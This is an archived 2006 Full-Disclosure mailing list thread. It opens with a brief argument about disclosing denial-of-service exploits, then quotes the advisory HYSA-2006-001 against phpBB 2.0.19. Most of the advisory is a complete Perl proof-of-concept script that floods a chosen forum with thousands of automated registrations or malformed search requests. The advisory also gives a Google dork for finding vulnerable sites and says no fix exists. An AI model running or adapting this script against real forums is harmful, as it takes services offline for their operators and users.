lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <9CA621425D6EAE4FBBD29326CC7D11060E9F38@unity-svr.Unity.local>
Date: Thu Jan 26 15:46:50 2006
From: Ed at unityitservices.co.uk (Edward Pearson)
Subject: HYSA-2006-001 phpBB 2.0.19 search.php
	andprofile.php DOS Vulnerability

No, I do believe full-disclosure to be the best method. In the case of DoS attacks, I think a point should be made of making sure the vendor is informed, and a patch available before disclosed, then I beleive itw down to the author's discretion when he releases the exploit, even if its a PoC.
   
________________________________

From: poo [mailto:skodliv@...il.com] 
Sent: 26 January 2006 11:31
To: Edward Pearson
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability


so what youre saying is that DoS exploits shouldnt be disclosed?


On 1/25/06, Edward Pearson <Ed@...tyitservices.co.uk> wrote: 

	The less said about DoS attacks the better. A tactic mostly employed by asexual teenagers who live in their parent's basement and call themselves "h4x0rz". 
	  
________________________________

	From: full-disclosure-bounces@...ts.grok.org.uk [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of h4cky0u
	Sent: 25 January 2006 14:44
	To: full-disclosure@...ts.grok.org.uk
	Cc: bugtraq@...urityfocus.com
	Subject: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability
	
	 
	
	------------------------------------------------------
	      HYSA-2006-001 h4cky0u.org <http://h4cky0u.org/>  Advisory 010
	
	------------------------------------------------------
	Date - Wed Jan 25 2006
	
	
	
	TITLE:
	======
	
	phpBB 2.0.19 search.php and profile.php DOS Vulnerability
	
	
	SEVERITY:
	=========
	
	High
	
	
	SOFTWARE:
	=========
	
	phpBB 2.0.19 and prior
	
	
	INFO:
	
	
	=====
	
	phpBB is a high powered, fully scalable, and highly customizable 
	Open Source bulletin board package. phpBB has a user-friendly 
	interface, simple and straightforward administration panel, and 
	helpful FAQ. Based on the powerful PHP server language and your 
	
	choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, 
	phpBB is the ideal free community solution for all web sites.
	
	Support Website : 
	http://www.phpbb.com <http://www.phpbb.com/> 
	
	
	
	BUG DESCRIPTION:
	================
	
	The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at -
	
	
	http://h4cky0u.org/viewtopic.php?t=637
	<http://h4cky0u.org/viewtopic.php?t=637> 
	
	This one affected only versions uptill phpBB 2.0.15. The exploit code has been recoded which affects the latest version too. The bug resides in the following two scripts-
	
	profile.php << By registering as many users as you can. 
	
	search.php  << By searching in a way that the db cannot understand.
	
	
	Proof Of Concept Code:
	======================
	
	#!/usr/bin/perl 
	####################################### 
	##   Recoded by: mix2mix and Elioni of 
	http://ahg-khf.org <http://ahg-khf.org/> 
	##   And h4cky0u Security Forums (
	http://h4cky0u.org <http://h4cky0u.org/> ) 
	##   Name: phpBBDoSReloaded
	##   Original Author: HaCkZaTaN of Neo Security Team 
	
	##   Tested on phpBB 2.0.19 and earlier versions
	##   Ported to perl by g30rg3_x
	##   Date: 25/01/06
	####################################### 
	use IO::Socket; 
	
	## Initialized X 
	$x = 0; 
	
	print q(
	
	  phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN
	  Recoded by Albanian Hackers Group &
	  h4cky0u Security Forums	
	
	); 
	print q(Host |without-> http://www.| ); 
	
	$host = <STDIN>; 
	chop ($host); 
	
	print q(Path |example-> /phpBB2/ or /| ); 
	$pth = <STDIN>; 
	chop ($pth); 
	
	print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| ); 
	
	$type = <STDIN>; 
	chop ($type); 
	
	## Tipi p?r regjistrim 
	if($type == 1){ 
	
	## User Loop for 9999 loops (enough for Flood xDDDD) 
	while($x != 9999) 
	{ 
	
	## Antari q? regjistrohet automatikisht? "X" 
	
	$uname = "username=AHG__" . "$x"; 
	
	## Emaili q? regjistrohet ne baz?n "X" 
	$umail = "&email=AHG__" . "$x"; 
	
	$postit = "$uname"."$umail"."%40ahg-
	crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit
	
	"; 
	
	$lrg = length $postit; 
	
	my $sock = new IO::Socket::INET ( 
	                                 PeerAddr => "$host", 
	                                 PeerPort => "80", 
	
	
	                                 Proto => "tcp", 
	                                ); 
	die "\nNuk mundem te lidhemi me hostin sepse ?sht dosirat ose nuk egziston: $!\n" unless $sock; 
	
	## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums 
	
	print $sock "POST $pth"."profile.php HTTP/1.1\n"; 
	print $sock "Host: $host\n"; 
	print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; 
	
	print $sock "Referer: $host\n"; 
	print $sock "Accept-Language: en-us\n"; 
	print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
	print $sock "Accept-Encoding: gzip, deflate\n"; 
	
	print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; 
	print $sock "Connection: Keep-Alive\n"; 
	print $sock "Cache-Control: no-cache\n"; 
	
	print $sock "Content-Length: $lrg\n\n"; 
	print $sock "$postit\n"; 
	close($sock); 
	
	## Print a "+" for every loop 
	syswrite STDOUT, "+"; 
	
	$x++; 
	} 
	
	
	
	## Tipi 2-sh? p?r K?rkim(Flood) 
	} 
	elsif ($type == 2){ 
	
	while($x != 9999) 
	{ 
	## Final Search String to Send 
	$postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200"; 
	
	
	## Posit Length 
	$lrg = length $postit; 
	
	## Connect Socket with Variables Provided By User 
	my $sock = new IO::Socket::INET ( 
	                                 PeerAddr => "$host", 
	
	
	                                 PeerPort => "80", 
	                                 Proto => "tcp", 
	                                ); 
	die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; 
	
	
	## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums 
	print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n"; 
	print $sock "Host: $host\n"; 
	
	
	print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; 
	print $sock "Referer: $host\n"; 
	print $sock "Accept-Language: en-us\n"; 
	
	print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
	print $sock "Accept-Encoding: gzip, deflate\n"; 
	print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8
	
	) Gecko/20050511 Firefox/1.0.4\n"; 
	print $sock "Connection: Keep-Alive\n"; 
	print $sock "Cache-Control: no-cache\n"; 
	print $sock "Content-Length: $lrg\n\n"; 
	print $sock "$postit\n"; 
	
	close($sock); 
	
	## Print a "+" for every loop 
	syswrite STDOUT, "+"; 
	
	## Increment X in One for every Loop 
	$x++; 
	} 
	}else{ 
	## STF??? Qfar? keni Shtypur 
	   die "Mund?sia nuk Lejohet +_-???\n"; 
	
	}
	
	
	FIX:
	====
	
	No fix available as of date.
	
	
	GOOGLEDORK:
	===========
	
	"Powered by phpBB" 
	
	
	CREDITS:
	========
	
	- This vulnerability was discovered and researched by HaCkZaTaN of NeoSecurityteam.
	
	
	
	- Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest release of the script -
	
	Web : 
	http://ahg-khf.org <http://ahg-khf.org/> 
	
	mail : webmaster at ahg-khf dot org
	
	
	
	- Co Researcher -
	
	h4cky0u of h4cky0u Security Forums.
	
	mail : h4cky0u at gmail dot com
	
	web : 
	http://www.h4cky0u.org <http://www.h4cky0u.org/> 
	
	
	ORIGINAL ADVISORY:
	==================
	
	
	http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt
	
	
	-- 
	http://www.h4cky0u.org <http://www.h4cky0u.org/> 
	(In)Security at its best... 

	_______________________________________________ 
	Full-Disclosure - We believe in it.
	Charter: http://lists.grok.org.uk/full-disclosure-charter.html 
	Hosted and sponsored by Secunia - http://secunia.com/
	
	




-- 
smile tomorrow will be worse 
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060126/4c794669/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ